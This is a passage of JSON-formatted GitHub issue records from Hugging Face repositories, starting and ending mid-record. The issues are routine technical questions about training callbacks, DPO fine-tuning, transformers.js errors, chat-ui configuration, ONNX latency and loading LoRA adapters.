**kwargs):\r\n if state.is_world_process_zero and self.training_bar is not None:\r\n # The last callback_handler.on_log() call in the training loop logs `train_loss` as opposed to `loss`.\r\n # From some digging through transformers code, the `train_loss` is the average training loss\r\n # during training.\r\n # See: https://github.com/huggingface/transformers/blob/v4.27.2/src/transformers/trainer.py#L2025-L2026\r\n self.loss = (\r\n state.log_history[-1][\"loss\"]\r\n if state.log_history and \"loss\" in state.log_history[-1]\r\n else state.log_history[-1][\"train_loss\"]\r\n )\r\n self.num_input_tokens_seen = format_number_suffix(state.num_input_tokens_seen)\r\n self.training_bar.set_postfix_str(\r\n f\"loss: {self.loss:.4f}, tokens: {self.num_input_tokens_seen}\",\r\n )\r\n\r\n def on_train_end(self, args, state, control, **kwargs):\r\n if state.is_world_process_zero:\r\n self.training_bar.close()\r\n self.training_bar = None\r\n```\r\n\r\nIn my trainer arguments, I explicitly `disable_tdqm` so I can pass this as a custom callback in place of the original ProgressCallback. I also set `logging_steps` to 1 so that I can get metrics back from every step through the `log_history` attribute in the TrainerState object. \r\n\r\nThe challenge I'm having is that it logs the metric to stdout, but I am not sure where that actually comes from in the code. I don't want that behavior since I want to surface relevant information directly in my TQDM progress back through my callback. Looking at the transformers trainer, I've narrowed down that metrics get pass to `on_log` in the callback, and that seems to happen from within this function at the end of each step of training and then again at the end of training: https://github.com/huggingface/transformers/blob/v4.27.2/src/transformers/trainer.py#L2224 \r\n\r\nWhen I set a breakpoint at the end of `on_log` in my callback, I can confirm that the logs object doesn't get printed to stdout. So it happens somewhere between that and this looping to get to the next train step, but not sure if I am missing something obvious since I'm still new to the transformers codebase.\r\n\r\nHere's what I see in my output:\r\n```\r\n***** Running training *****\r\n Num examples = 183\r\n Num Epochs = 3\r\n Instantaneous batch size per device = 1\r\n Total train batch size (w. parallel, distributed & accumulation) = 16\r\n Gradient Accumulation steps = 16\r\n Total optimization steps = 33\r\n Number of trainable parameters = 256\r\n 3%|\u2588\u2588\u258d | 1/33 [00:01<00:34, 1.07s/it, loss", "url": "https://github.com/huggingface/transformers/issues/28924", "state": "closed", "labels": [], "created_at": "2024-02-08T10:23:28Z", "updated_at": "2024-02-08T17:26:02Z", "user": "arnavgarg1" }, { "repo": "huggingface/alignment-handbook", "number": 120, "title": "(QLoRA) DPO without previous SFT", "body": "Because of the following LLM-Leaderboard measurements, I want to perform QLoRA DPO without previous QLoRA SFT:\r\n```\r\nalignment-handbook/zephyr-7b-dpo-qlora: +Average: 63.51; +ARC 63.65; +HSwag 85.35; -+MMLU 63.82; ++TQA: 47.14; (+)Win 79.01; +GSM8K 42.08; \r\n\r\nalignment-handbook/zephyr-7b-sft-qlora: -Average: 59; (+)ARC 60.07; (-)HSwag 82.36; -MMLU 61.65; -TQA: 38.88; -Win 76.8; -GSM8K 34.27; \r\n\r\nmistralai/Mistral-7B-v0.1: Average: 60.97; ARC 59.98; HSwag 83.31; MMLU 64.16; TQA: 42.15; Win 78.37; GSM8K 37.83; \r\n```\r\nAs you can see, there is catastrophic forgetting in `zephyr-7b-sft-qlora` in almost all tasks, especially in MMLU, TruthfulQA, and GSM8K. Thus I wonder why do SFT at all?\r\n\r\nIn more detail\r\n============\r\n\r\nQ1: Why is there so much catastrophic forgetting in `zephyr-7b-sft-qlora` ? Due to the following improvements by DPO, the dataset seems to be apt. \r\n\r\nQ2: Why is SFT performed before DPO at all? Is it some prerequisite, like SFT training the model to follow instructions at all, before DPO aligning the responses to instructions with human preferences? \r\n\r\nQ3: I tried the following for DPO without previous SFT:\r\nModify `recipes/zephyr-7b-beta/dpo/config_qlora.yaml` by using `model_name_or_path: mistralai/Mistral-7B-v0.1` and then calling `scripts/run_dpo.py` on it:\r\n```\r\necho -e \"2,3c2\\n< model_name_or_path: mistralai/Mistral-7B-v0.1\\n< model_revision: main\\n---\\n> model_name_or_path: alignment-handbook/zephyr-7b-sft-qlora\\n36c35\\n< gradient_accumulation_steps: 8\\n---\\n> gradient_accumulation_steps: 2\\n40c39\\n< hub_model_id: zephyr-7b-dpo-qlora-no-sft\\n---\\n> hub_model_id: zephyr-7b-dpo-qlora\\n49,51c48,50\\n< output_dir: data/zephyr-7b-dpo-qlora-no-sft # It is handy to append `hub_model_revision` to keep track of your local experiments\\n< per_device_train_batch_size: 1\\n< per_device_eval_batch_size: 2\\n---\\n> output_dir: data/zephyr-7b-dpo-qlora # It is handy to append `hub_model_revision` to keep track of your local experiments\\n> per_device_train_batch_size: 4\\n> per_device_eval_batch_size: 8\\n53,55d51\\n< report_to:\\n< - tensorboard\\n< - wandb\" | patch recipes/zephyr-7b-beta/dpo/config_qlora.yaml\r\nACCELERATE_LOG_LEVEL=info accelerate launch --config_file recipes/accelerate_configs/multi_gpu.yaml --num_processes=1 scripts/run_dpo.py recipes/zephyr-7b-beta/dpo/config_qlora.yaml\r\n```\r\nHowever, I get the error described at https://github.com/huggingface/alignment-handbook/issues/93. The solution there inspired me to do the following (so I don't have to go into the cache to replace tokenizer configs): Add in line 77 of `src/alignment/data.py`\r\n```\r\ntokenizer.chat_template = \"{% for message in messages %}\\n{% if message['role'] == 'user' %}\\n{{ '<|user|>\\n' + message['conten\\\r\nt'] + eos_token }}\\n{% elif message['role'] == 'system' %}\\n{{ '<|system|>\\n' + message['content'] + eos_token }}\\n{% elif message['role'] \\\r\n== 'assistant' %}\\n{{ '<|assistant|>\\n' + message['content'] + eos_token }}\\n{% endif %}\\n{% if loop.last and add_generation_prompt %}\\n{{\\\r\n '<|assistant|>' }}\\n{% endif %}\\n{% endfor %}\"\r\n ```\r\nBut Mistral's `default_chat_template` already allows system messages, so the problem seems to be that the dialogs in the dataset really do not alternate between user and assistant messages. Right? What is the reason for this?\r\n\r\nMistrals `default_chat_template` causing the error message:\r\n``` \r\n{% if messages[0]['role'] == 'system' %}{% set loop_messages = messages[1:] %}{% set system_message = messages[0]['content'] %}{% elif false == true and not '<>' in messages[0]['content'] %}{% set loop_messages = messages %}{% set system_message = 'You are a helpful, respectful and honest assistant. Always answer as helpfully as possible, while being safe. Your answers should not include any harmful, unethical, \r\nracist, sexist, toxic, dangerous, or illegal content. Please ensure that your responses are socially unbiased and positive in nature.\\n\\nIf a question does not make any sense, or is not factually coherent, explain why instead of answering something not correct. If you don\\'t know\r\n the answer to a question, please don\\'t share false information.' %}{% else %}{% set loop_messages = messages %}{% set system_message = false %}{% endif %}{% for message in loop_messages %}{% if (message['role'] == 'user') != (loop.index0 % 2 == 0) %}{{ raise_exception('Conversation roles must alternate user/assistant/user/assistant/...') }}{% endif %}{% if loop.index0 == 0 and system_message != false %}{% set conte\r\nnt = '<>\\n' + system_message + '\\n<>\\n\\n' + message['content'] %}{% else %}{% set content = message['content'] %}{% endif %}{% if message['role'] == 'user' %}{{ bos_token + '[INST] ' + content.strip() + ' [/INST]' }}{% elif message['role'] == 'system' %}{{ '<>\\n' + content.strip() + '\\n<>\\n\\n' }}{% elif message['role'] == 'assistant' %}{{ ' ' + content.strip() + ' ' + eos_token }}{% endif %}{%", "url": "https://github.com/huggingface/alignment-handbook/issues/120", "state": "open", "labels": [], "created_at": "2024-02-08T09:56:50Z", "updated_at": "2024-02-09T22:15:10Z", "comments": 1, "user": "DavidFarago" }, { "repo": "huggingface/transformers.js", "number": 577, "title": "Getting 'fs is not defined' when trying the latest \"background removal\" functionality in the browser?", "body": "### Question\r\n\r\nI copied the code from https://github.com/xenova/transformers.js/blob/main/examples/remove-background-client/main.js to here, but I'm getting this error with v2.15.0 of @xenova/transformers.js:\r\n\r\n```\r\nUncaught ReferenceError: fs is not defined\r\n at env.js:36:31\r\n at [project]/node_modules/.pnpm/@xenova+transformers@2.15.0/node_modules/@xenova/transformers/src/env.js [app-client] (ecmascript) (http://localhost:3001/_next/static/chunks/8484b_%40xenova_transformers_src_5fe153._.js:258:3)\r\n at runtime-base.ts:322:21\r\n at runModuleExecutionHooks (runtime-base.ts:376:5)\r\n at instantiateModule (runtime-base.ts:321:5)\r\n at getOrInstantiateModuleFromParent (runtime-base.ts:424:10)\r\n at esmImport (runtime-utils.ts:205:18)\r\n at hub.js:6:2\r\n at [project]/node_modules/.pnpm/@xenova+transformers@2.15.0/node_modules/@xenova/transformers/src/utils/hub.js [app-client] (ecmascript) (http://localhost:3001/_next/static/chunks/8484b_%40xenova_transformers_src_5fe153._.js:783:3)\r\n at runtime-base.ts:322:21\r\n at runModuleExecutionHooks (runtime-base.ts:376:5)\r\n at instantiateModule (runtime-base.ts:321:5)\r\n at getOrInstantiateModuleFromParent (runtime-base.ts:424:10)\r\n at esmImport (runtime-utils.ts:205:18)\r\n at tokenizers.js:21:2\r\n at [project]/node_modules/.pnpm/@xenova+transformers@2.15.0/node_modules/@xenova/transformers/src/tokenizers.js [app-client] (ecmascript) (http://localhost:3001/_next/static/chunks/8484b_%40xenova_transformers_src_5fe153._.js:6729:3)\r\n at runtime-base.ts:322:21\r\n at runModuleExecutionHooks (runtime-base.ts:376:5)\r\n at instantiateModule (runtime-base.ts:321:5)\r\n at getOrInstantiateModuleFromParent (runtime-base.ts:424:10)\r\n at esmImport (runtime-utils.ts:205:18)\r\n at pipelines.js:14:2\r\n at [project]/node_modules/.pnpm/@xenova+transformers@2.15.0/node_modules/@xenova/transformers/src/pipelines.js [app-client] (ecmascript) (http://localhost:3001/_next/static/chunks/8484b_%40xenova_transformers_src_5fe153._.js:17183:3)\r\n at runtime-base.ts:322:21\r\n at runModuleExecutionHooks (runtime-base.ts:376:5)\r\n at instantiateModule (runtime-base.ts:321:5)\r\n at getOrInstantiateModuleFromParent (runtime-base.ts:424:10)\r\n at esmImport (runtime-utils.ts:205:18)\r\n at 8484b_@xenova_transformers_src_5fe153._.js:17215:237\r\n at [project]/node_modules/.pnpm/@xenova+transformers@2.15.0/node_modules/@xenova/transformers/src/transformers.js [app-client] (ecmascript) {module evaluation} (http://localhost:3001/_next/static/chunks/8484b_%40xenova_transformers_src_5fe153._.js:17228:3)\r\n at runtime-base.ts:322:21\r\n at runModuleExecutionHooks (runtime-base.ts:376:5)\r\n at instantiateModule (runtime-base.ts:321:5)\r\n at getOrInstantiateModuleFromParent (runtime-base.ts:424:10)\r\n at esmImport (runtime-utils.ts:205:18)\r\n at _b29e97._.js:19146:268\r\n at [project]/app/remove/background/page.tsx [app-client] (ecmascript) (http://localhost:3001/_next/static/chunks/_b29e97._.js:19389:3)\r\n at runtime-base.ts:322:21\r\n at runModuleExecutionHooks (runtime-base.ts:376:5)\r\n at instantiateModule (runtime-base.ts:321:5)\r\n at getOrInstantiateModuleFromParent (runtime-base.ts:424:10)\r\n at commonJsRequire (runtime-utils.ts:230:18)\r\n at requireModule (react-server-dom-turbopack-client.browser.development.js:154:23)\r\n at initializeModuleChunk (react-server-dom-turbopack-client.browser.development.js:1336:17)\r\n at readChunk (react-server-dom-turbopack-client.browser.development.js:1146:7)\r\n at mountLazyComponent (react-dom.development.js:16652:19)\r\n at beginWork$1 (react-dom.development.js:18388:16)\r\n at beginWork (react-dom.development.js:26791:14)\r\n at performUnitOfWork (react-dom.development.js:25637:12)\r\n at workLoopSync (react-dom.development.js:25353:5)\r\n```\r\n\r\nAny idea what is wrong and how to fix it? Here is my code, which basically a direct React.js port of the background removal example you all shared:\r\n\r\n```tsx\r\n'use client'\r\n\r\nimport {\r\n AutoModel,\r\n AutoProcessor,\r\n env,\r\n PreTrainedModel,\r\n Processor,\r\n RawImage,\r\n} from '@xenova/transformers'\r\nimport React, {\r\n MouseEvent,\r\n useCallback,\r\n useEffect,\r\n useRef,\r\n useState,\r\n} from 'react'\r\nimport _ from 'lodash'\r\nimport FileDropzone from '~/components/FileDropzone'\r\n\r\n// Since we will download the model from the Hugging Face Hub, we can skip the local model check\r\nenv.allowLocalModels = false\r\n\r\n// Proxy the WASM backend to prevent the UI from freezing\r\nenv.backends.onnx.wasm.proxy = true\r\n\r\nfunction useModel(): {\r\n model?: PreTrainedModel\r\n processor?: Processor\r\n} {\r\n const [model, setModel] = useState()\r\n const [processor, setProcessor] = useState()\r\n\r\n useEffect(() => {\r\n AutoModel.from_pretrained('briaai/RMBG-1.4', {\r\n config: { model_type: 'custom' },\r\n }).then(m => {\r\n setModel(m)\r\n })\r\n\r\n AutoProcessor.from_pretrained('briaai/RMBG-1.4', {\r\n config: {\r\n ", "url": "https://github.com/huggingface/transformers.js/issues/577", "state": "open", "labels": [ "question" ], "created_at": "2024-02-08T04:34:59Z", "updated_at": "2024-11-26T05:20:22Z", "user": "lancejpollard" }, { "repo": "huggingface/transformers.js", "number": 575, "title": "Can GPU acceleration be used when using this library in a node.js environment?", "body": "### Question\n\nHello, I have looked into the GPU support related issue, but all mentioned content is related to webGPU. May I ask if GPU acceleration in the node.js environment is already supported? Refer: https://github.com/microsoft/onnxruntime/tree/main/js/node", "url": "https://github.com/huggingface/transformers.js/issues/575", "state": "closed", "labels": [ "question" ], "created_at": "2024-02-07T03:37:50Z", "updated_at": "2025-01-20T15:05:00Z", "user": "SchneeHertz" }, { "repo": "huggingface/dataset-viewer", "number": 2408, "title": "Add task tags in /hub-cache?", "body": "On the same model as https://github.com/huggingface/datasets-server/pull/2386, detect and associate tags to a dataset to describe the tasks it can be used for.\r\n\r\nPreviously discussed at https://github.com/huggingface/datasets-server/issues/561#issuecomment-1250029425", "url": "https://github.com/huggingface/dataset-viewer/issues/2408", "state": "closed", "labels": [ "question", "feature request", "P2" ], "created_at": "2024-02-06T11:17:19Z", "updated_at": "2024-06-19T15:43:15Z", "user": "severo" }, { "repo": "huggingface/dataset-viewer", "number": 2407, "title": "Remove env var HF_ENDPOINT?", "body": "Is it still required to set HF_ENDPOINT as an environment variable?\r\n\r\nhttps://github.com/huggingface/datasets-server/blob/main/services/worker/src/worker/resources.py#L41-L45\r\n\r\n", "url": "https://github.com/huggingface/dataset-viewer/issues/2407", "state": "closed", "labels": [ "duplicate", "question", "refactoring / architecture", "P2" ], "created_at": "2024-02-06T11:11:24Z", "updated_at": "2024-02-06T14:53:12Z", "user": "severo" }, { "repo": "huggingface/chat-ui", "number": 786, "title": "Can't get Mixtral to work with web-search", "body": "I have been following this project for a while and recently tried setting up oobabooga Mixtral-8x7b\r\n\r\nI used the official prompt template used in huggingface.co :\r\n\r\n```\r\n {{#each messages}}{{#ifUser}}[INST]{{#if @first}}{{#if @root.preprompt}}{{@root.preprompt}}\\n{{/if}}{{/if}} {{content}} [/INST]{{/ifUser}}{{#ifAssistant}} {{content}} {{/ifAssistant}}{{/each}}\r\n``` \r\n\r\nNormal chat works, and summarization for the title works, but web-search does not.\r\nIt always gives the full answer instead of a search term.\r\n\r\n![image](https://github.com/huggingface/chat-ui/assets/20077386/19f307ec-96a0-4e33-9f03-90755242da6c)\r\n\r\n\r\nHere is my local.env:\r\n\r\n\r\n```\r\nMONGODB_URL=mongodb://localhost:27017\r\nUSE_LOCAL_WEBSEARCH=true\r\nPUBLIC_APP_ASSETS=chatui\r\nHF_ACCESS_TOKEN=hf_none\r\nPUBLIC_APP_DESCRIPTION=\"ChatGPT But Open Source!\"\r\nPUBLIC_APP_NAME=ChatGPT\r\nMODELS=`[\r\n {\r\n \"name\": \"LocalGPT\",\r\n \"description\": \"Mixtral is a great overall model\",\r\n \"chatPromptTemplate\" : \" {{#each messages}}{{#ifUser}}[INST]{{#if @first}}{{#if @root.preprompt}}{{@root.preprompt}}\\n{{/if}}{{/if}} {{content}} [/INST]{{/ifUser}}{{#ifAssistant}} {{content}} {{/ifAssistant}}{{/each}}\",\r\n \"preprompt\": \"\",\r\n \"promptExamples\": [\r\n {\r\n \"title\": \"Write an email from bullet list\",\r\n \"prompt\": \"As a restaurant owner, write a professional email to the supplier to get these products every week: \\n\\n- Wine (x10)\\n- Eggs (x24)\\n- Bread (x12)\"\r\n }, {\r\n \"title\": \"Code a snake game\",\r\n \"prompt\": \"Code a basic snake game in python and give explanations for each step.\"\r\n }, {\r\n \"title\": \"Assist in a task\",\r\n \"prompt\": \"How do I make a delicious lemon cheesecake?\"\r\n }\r\n ],\r\n \"parameters\": {\r\n \"temperature\": 0.3,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 3072,\r\n \"max_new_tokens\": 2048,\r\n \"stop\": [\"\"]\r\n },\r\n \"endpoints\": [{\r\n \"type\" : \"openai\",\r\n \"baseURL\": \"http://127.0.0.1:5000/v1\"\r\n }]\r\n }\r\n]`\r\n\r\n``` \r\n", "url": "https://github.com/huggingface/chat-ui/issues/786", "state": "open", "labels": [], "created_at": "2024-02-06T07:14:08Z", "updated_at": "2024-02-16T10:45:40Z", "comments": 2, "user": "iChristGit" }, { "repo": "huggingface/dataset-viewer", "number": 2402, "title": "Reduce resources for /filter and /search?", "body": "They have nearly 0 traffic. https://grafana.huggingface.tech/d/i7gwsO5Vz/global-view?orgId=1&from=now-6h&to=now\r\n\r\nShould we reduce the number of pods? How to configure the right level?", "url": "https://github.com/huggingface/dataset-viewer/issues/2402", "state": "closed", "labels": [ "question", "infra", "P2", "prod" ], "created_at": "2024-02-05T21:44:56Z", "updated_at": "2024-02-28T17:55:50Z", "user": "severo" }, { "repo": "huggingface/dataset-viewer", "number": 2390, "title": "Store the repo visibility (public/private) to filter webhooks", "body": "See https://github.com/huggingface/datasets-server/pull/2389#pullrequestreview-1862425050\r\n\r\nNot sure if we want to do it, or wait for the Hub to provide more finely scoped webhooks. See also #2208, where we wanted to store metadata about the datasets.", "url": "https://github.com/huggingface/dataset-viewer/issues/2390", "state": "closed", "labels": [ "question", "P2" ], "created_at": "2024-02-05T12:37:30Z", "updated_at": "2024-06-19T15:37:36Z", "user": "severo" }, { "repo": "huggingface/transformers.js", "number": 567, "title": "Does await pipeline() support multithreading? I've tried all kinds of multithreaded calls and it still returns the results one by one in order.", "body": "### Question\n\nDoes await pipeline() support multithreading? I've tried all kinds of multithreaded calls and it still returns the results one by one in order.", "url": "https://github.com/huggingface/transformers.js/issues/567", "state": "open", "labels": [ "question" ], "created_at": "2024-02-05T11:12:34Z", "updated_at": "2024-02-05T11:12:34Z", "user": "a414166402" }, { "repo": "huggingface/transformers.js", "number": 565, "title": "How can i use this Model for image matting?", "body": "### Question\n\nhttps://github.com/ZHKKKe/MODNet?tab=readme-ov-file\r\n\r\nThey have ONNX file and the python cli usage looks simple, but I can't find how to use with transformers.js.\r\n```\r\n!python -m demo.image_matting.colab.inference \\\r\n --input-path demo/image_matting/colab/input \\\r\n --output-path demo/image_matting/colab/output \\\r\n --ckpt-path ./pretrained/modnet_photographic_portrait_matting.ckpt\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/565", "state": "closed", "labels": [ "question" ], "created_at": "2024-02-05T09:28:28Z", "updated_at": "2024-02-07T11:33:26Z", "user": "cyio" }, { "repo": "huggingface/transformers.js", "number": 564, "title": "Can models from user disks load and run in my HF space?", "body": "### Question\r\n\r\nIm fiddling around with the react-translator template.\r\nWhat I have accomplished so far:\r\n- Run local (on disk in public folder) model in localhost webapp.\r\n- Run hosted (on HF) model in localhost webapp.\r\n- Run hosted (on HF) model in HF Space webapp.\r\n\r\nWhat i want to accomplish but can't figure out:\r\n- Use local (on disk in any folder) model in HF Space webapp.\r\n\r\nIs this possible? \r\n\r\nFrom what i understand so far, local models have to be in the public folder of the webapp, but that defeats the purpose of my webapp, which would be to allow users to benchmark models from any folder of their disk in my HF Space. \r\n\r\nPreferably the user would provide a path or use drag'n'drop to provide their model folder location on the disk and the webapp would then proceed to load the model from the provided location into the application cache. \r\n\r\nThe reason i need this specific setup is because i work on a benchmarking tool and I don't want to force users to host their models on HF in order to be able to benchmark them.", "url": "https://github.com/huggingface/transformers.js/issues/564", "state": "closed", "labels": [ "question" ], "created_at": "2024-02-05T08:00:55Z", "updated_at": "2024-06-07T01:17:24Z", "user": "saferugdev" }, { "repo": "huggingface/transformers", "number": 28860, "title": "Question: How do LLMs learn to be \"Generative\", as we often describe them?", "body": "(Please forgive me and let me know if I'm not allowed to ask this kind of question here. I'm so sorry if I'm bothering everyone.)\r\n\r\nAFAIK to be called \"generative\", a model should have the ability to learn the joint probability over the training data. In the case of LLMs, we apply the chain rule of Bayes' formula to achieve this by leveraging the autoregressive method for every token of each input text sequence. For example, with a text sequence of 4 tokens, it can be written as:\r\n```\r\np(x4,x3,x2,x1) = p(x4|x3,x2,x1) * p(x3|x2,x1) * p(x2|x1) * p(x1)\r\n```\r\nwhere `x1` denotes the 1st token, `x2` denotes the 2nd token and so on, respectively.\r\n\r\nI understand the conditional terms `p(x_n|...)` where we use cross-entropy to calculate their losses. However, I'm unsure about the probability of the very first token `p(x1)`. How is it calculated? Is it in some configurations of the training process, or in the model architecture, or in the loss function?\r\n\r\nIMHO, if the model doesn't learn `p(x1)` properly, the entire formula for Bayes' rule cannot be completed, and we can't refer to LLMs as \"truly generative\". Am I missing something here?\r\n\r\nI asked the [same question on `nanoGPT` repo](https://github.com/karpathy/nanoGPT/issues/432) and [on HN](https://news.ycombinator.com/item?id=39249301). I'm also reading Transformer codes from this repo, but I haven't found the answer I'm looking for yet. Could someone please enlighten me? Thank in advance!", "url": "https://github.com/huggingface/transformers/issues/28860", "state": "closed", "labels": [], "created_at": "2024-02-05T07:10:23Z", "updated_at": "2024-02-05T12:22:27Z", "user": "metalwhale" }, { "repo": "huggingface/sentence-transformers", "number": 2470, "title": "BGE Reranker / BERT Crossencoder Onnx model latency issue", "body": "I am using the Int8 quantized version of BGE-reranker-base model converted to the Onnx model. I am processing the inputs in batches. Now the scenario is that I am experiencing a latency of 20-30 secs with the original model. With the int8 quantized and onnx optimized model, the latency was reduced to 8-15 secs keeping all the configurations the same like hardware, batch processing, and everything I used with the original torch model. \r\nI am using Flask as an API server, on a quad-core machine.\r\nI want further to reduce the model latency of the Onnx model. How can I do so?\r\nAlso please suggest anything more I can do during the deployment ", "url": "https://github.com/huggingface/sentence-transformers/issues/2470", "state": "open", "labels": [ "question" ], "created_at": "2024-02-05T05:54:18Z", "updated_at": "2024-02-09T06:59:51Z", "user": "ojasDM" }, { "repo": "huggingface/chat-ui", "number": 774, "title": "Where are the image and pdf upload features when running on locally using this repo?", "body": "I see there are issues and features being talked about and added for the image upload and parsing PDFs as markdown etc. However, I dont see these features in when I cloned this repo and started chatui using \"npm run dev\" locally. \r\nAm I missing something? \r\n\r\n#641 are the features I am talking about. ", "url": "https://github.com/huggingface/chat-ui/issues/774", "state": "closed", "labels": [], "created_at": "2024-02-05T00:41:05Z", "updated_at": "2024-02-05T08:48:29Z", "comments": 1, "user": "zubu007" }, { "repo": "huggingface/chat-ui", "number": 771, "title": "using openai api key for coporate", "body": "Hi\r\nWe are working with an open ai key for our corporate ( it has a corporate endpoint) \r\nthis is how we added the model to .env.local\r\n```\r\nMODELS=`[\r\n {\r\n \"name\": \"Corporate local instance of GPT 3.5 Model\",\r\n \"endpoints\": [{\r\n \"type\": \"openai\",\r\n \"url\": \"corporate url\"\r\n }],\r\n \"userMessageToken\": \"User: \",\r\n \"assistantMessageToken\": \"Assistant: \",\r\n \"messageEndToken\": \"\",\r\n \"preprompt\": \" \",\r\n \"prepromptUrl\": \"http://127.0.0.1:8000/preprompt.txt\",\r\n \"parameters\": {\r\n \"temperature\": 0.9,\r\n \"max_new_tokens\": 1024,\r\n \"truncate\": 31000\r\n },\r\n```\r\nThe problem I can't connet t to the model there are authentications issues. this is what we get:\r\n\r\n\r\nanyone else tried to connect with corporate openai api key?\r\nHow can we solve this?\r\nwe can connect to the model using python so this is not an issue with the credentials.", "url": "https://github.com/huggingface/chat-ui/issues/771", "state": "open", "labels": [ "models" ], "created_at": "2024-02-04T11:23:59Z", "updated_at": "2024-02-06T15:01:50Z", "comments": 1, "user": "RachelShalom" }, { "repo": "huggingface/optimum-neuron", "number": 460, "title": "[QUESTION] What is the difference between optimum-neuron and transformers-neuronx?", "body": "I would like to understand the differences between this optimum-neuron and [transformers-neuronx](https://github.com/aws-neuron/transformers-neuronx).", "url": "https://github.com/huggingface/optimum-neuron/issues/460", "state": "closed", "labels": [], "created_at": "2024-02-02T18:27:46Z", "updated_at": "2024-03-27T11:04:52Z", "user": "leoribeiro" }, { "repo": "huggingface/dataset-viewer", "number": 2376, "title": "Should we increment \"failed_runs\" when error is \"ResponseAlreadyComputedError\"?", "body": "Related to https://github.com/huggingface/datasets-server/issues/1464: is it really an error?", "url": "https://github.com/huggingface/dataset-viewer/issues/2376", "state": "closed", "labels": [ "question", "P2" ], "created_at": "2024-02-02T12:08:31Z", "updated_at": "2024-02-22T21:16:12Z", "user": "severo" }, { "repo": "huggingface/autotrain-advanced", "number": 484, "title": "How to ask question AutoTrained LLM , If I ask question dosn't return any answer", "body": "Hi,\r\nLLM training was successful , But I asked any question from my trained context and it was not answered.How to ask proper question?\r\n\r\nrom transformers import AutoModelForCausalLM, AutoTokenizer\r\n\r\nmodel_path = \"bert-base-uncased_finetuning\"\r\n\r\ntokenizer = AutoTokenizer.from_pretrained(model_path)\r\nmodel = AutoModelForCausalLM.from_pretrained(\r\n model_path,\r\n device_map=\"cuda\",\r\n torch_dtype='auto'\r\n).eval()\r\n\r\n# Prompt content: \"hi\"\r\nmessages = [\r\n {\"role\": \"user\", \"content\": \"hi\"}\r\n]\r\n\r\ninput_ids = tokenizer.apply_chat_template(conversation=messages, tokenize=True, add_generation_prompt=True, return_tensors='pt')\r\noutput_ids = model.generate(input_ids.to('cuda'))\r\nresponse = tokenizer.decode(output_ids[0][input_ids.shape[1]:], skip_special_tokens=True)\r\n\r\n# Model response: \"Hello! How can I assist you today?\"\r\nprint(response)\r\n\r\nSome weights of BertLMHeadModel were not initialized from the model checkpoint at bert-base-uncased and are newly initialized: ['cls.predictions.decoder.bias']\r\nYou should probably TRAIN this model on a down-stream task to be able to use it for predictions and inference.\r\nexample\r\n/usr/local/lib/python3.10/dist-packages/transformers/generation/utils.py:1128: UserWarning: Using the model-agnostic default `max_length` (=20) to control the generation length. We recommend setting `max_new_tokens` to control the maximum length of the generation.\r\n warnings.warn(\r\n/usr/local/lib/python3.10/dist-packages/transformers/generation/utils.py:1136: UserWarning: Input length of input_ids is 24, but `max_length` is set to 20. This can lead to unexpected behavior. You should consider increasing `max_new_tokens`.\r\n warnings.warn(\r\n", "url": "https://github.com/huggingface/autotrain-advanced/issues/484", "state": "closed", "labels": [ "stale" ], "created_at": "2024-02-02T09:29:07Z", "updated_at": "2024-03-04T15:01:36Z", "user": "charles-123456" }, { "repo": "huggingface/chat-ui", "number": 761, "title": "Does chat-ui support offline deployment? I have downloaded the weights to my local computer.", "body": " I have downloaded the weights to my local computer. Due to network issues, I am unable to interact with the huggingface website. Can I do offline deployment based on chat-ui and downloaded weights from huggingface? Do I not need to set HF_TOKEN=?Does that mean I don't need to set HF_TOKEN= in the .env.local file?", "url": "https://github.com/huggingface/chat-ui/issues/761", "state": "closed", "labels": [ "support" ], "created_at": "2024-02-02T07:57:19Z", "updated_at": "2024-02-04T03:23:25Z", "comments": 2, "user": "majestichou" }, { "repo": "huggingface/transformers.js", "number": 557, "title": "how to cast types?", "body": "### Question\n\nI have the following code:\r\n\r\n```\r\nconst pipe = await pipeline('embeddings');\r\n const output = await pipe([\r\n 'The quick brown fox jumps over the lazy dog',\r\n ]);\r\n const embedding = output[0][0];\r\n```\r\n\r\n`output[0][0]` causes a typescript error\uff1a\r\n\"CleanShot\r\n", "url": "https://github.com/huggingface/transformers.js/issues/557", "state": "open", "labels": [ "question" ], "created_at": "2024-02-02T04:38:20Z", "updated_at": "2024-02-08T19:01:06Z", "user": "pthieu" }, { "repo": "huggingface/diffusers", "number": 6819, "title": "How to let diffusers use local code for pipelineinstead of download it online everytime We use it?", "body": "I tried to use the instaflowpipeline from example/community to.run my test However, even after i git cloned the repository to my environment it still Keep trying to Download the latest object of the instaflow pipeline code Unfortunately in my area is hard for the environment to download it directly from rawgithub. I tried to change the downloaded code to let it just use these code already in my environment But find it hard to change the path to url.\r\n I would be appreciated if someone could find an proper answer . Thank you for your time and happy lunar new year!", "url": "https://github.com/huggingface/diffusers/issues/6819", "state": "closed", "labels": [], "created_at": "2024-02-02T02:53:48Z", "updated_at": "2024-11-28T05:44:10Z", "user": "Kevin-shihello-world" }, { "repo": "huggingface/diffusers", "number": 6817, "title": "How to use class_labels in the Unet2DConditionalModel or Unet2DModel when forward? ", "body": "Hi, I want to know what the shape or format of \"class\" is if I want to add the class condition to the unet? Just set the **classe_labels** 0, 1, 2, 3?\r\n\r\nUnet2DModel: **class_labels** (torch.FloatTensor, optional, defaults to None) \u2014 Optional class labels for conditioning. Their embeddings will be summed with the timestep embeddings.\r\n\r\nUnet2DConditionalModel: **class_labels** (torch.Tensor, optional, defaults to None) \u2014 Optional class labels for conditioning. Their embeddings will be summed with the timestep embeddings. timestep_cond \u2014 (torch.Tensor, optional, defaults to None): Conditional embeddings for timestep. If provided, the embeddings will be summed with the samples passed through the self.time_embedding layer to obtain the timestep embeddings.", "url": "https://github.com/huggingface/diffusers/issues/6817", "state": "closed", "labels": [], "created_at": "2024-02-02T02:17:40Z", "updated_at": "2024-02-07T07:31:35Z", "user": "boqian-li" }, { "repo": "huggingface/sentence-transformers", "number": 2465, "title": "How to load lora model to sentencetransformer model?", "body": "Dear UKPlab team,\r\n\r\nMy team and myself are working on a RAG project and right now we are fine tuning a retrieval model using peft library. The issue is once we have the model fine-tuned, we couldn't load the local config and checkpoints using `sentencetransformer`. \r\nHere is our hierarchy of the local path of the peft model\r\n- adapter_config.json\r\n- adapter_model.safetensors\r\n- ....\r\n\r\nWhen I look into the `sentence-transformers` package, the issue comes from the class```Transformer.py``` which doesn't consider the situation that the model path is a ```peftmodel``` path:\r\n` config = AutoConfig.from_pretrained(model_name_or_path, **model_args, 